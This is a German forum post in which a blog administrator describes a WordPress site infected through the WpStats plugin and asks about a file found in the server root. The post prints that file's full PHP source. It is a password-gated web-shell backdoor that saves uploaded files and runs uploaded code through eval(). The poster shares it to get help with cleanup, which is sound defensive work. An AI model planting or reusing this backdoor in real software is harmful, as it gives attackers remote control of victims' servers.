Guten Abend,
ich betreue gerade ein Blog, welches mit Hilfe des PlugIns WpStats infiziert wurde. Ein Trojaner Namens TR/Dldr.HTML.Agent.IS wurde über einen 1px x 1px großen iframe eingeschleust. Die Seite wird bei Google als "Diese Website kann Ihren Computer beschädigen." gelistet.
Das aber nur nebensächlich. Dar Trojaner konnte gottseidank lokalisiert werden. (Falls jemand ähnliches Problem hat und hierzu Hilfe braucht, bitte melden - ich weiß jetzt, wie man ihm zu Laibe rückt)
Mich beunruhigt eher noch etwas anderes. Und zwar habe ich im root des Servers noch die Datei ap_wp-config.php gefunden. Inhalt der Datei fängt erst bei Zeile 101 an (zunächst denkt man, sie ist leer):
<?php
@error_reporting(E_ALL);
@set_time_limit(0);
global $HTTP_SERVER_VARS;
define('PASSWD','md5code'); // Zeichenfolge durch "md5code" ersetzt
function say($t) {
echo "$t\n";
};
function testdata($t) {
say(md5("mark_$t"));
};
echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == PASSWD) {
if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
$HTTP_POST_FILES["s"]["size"])) {
if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
{
testdata('save_ok');
};
//eval($code);
} else {
testdata('save_fail');
};
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
$HTTP_POST_FILES["f"]["size"]))
{
eval($code);
testdata('ok');
} else {
testdata('fail');
};
} else {
testdata('pass');
};
testdata('end');
echo "</pre>";
?>
Alles anzeigen
Weiß jemand woher die kommt b.z.w. hat solch eine Datei schon mal gesehen? Mir kommt das weiterhin spanisch vor.
Vielen Dank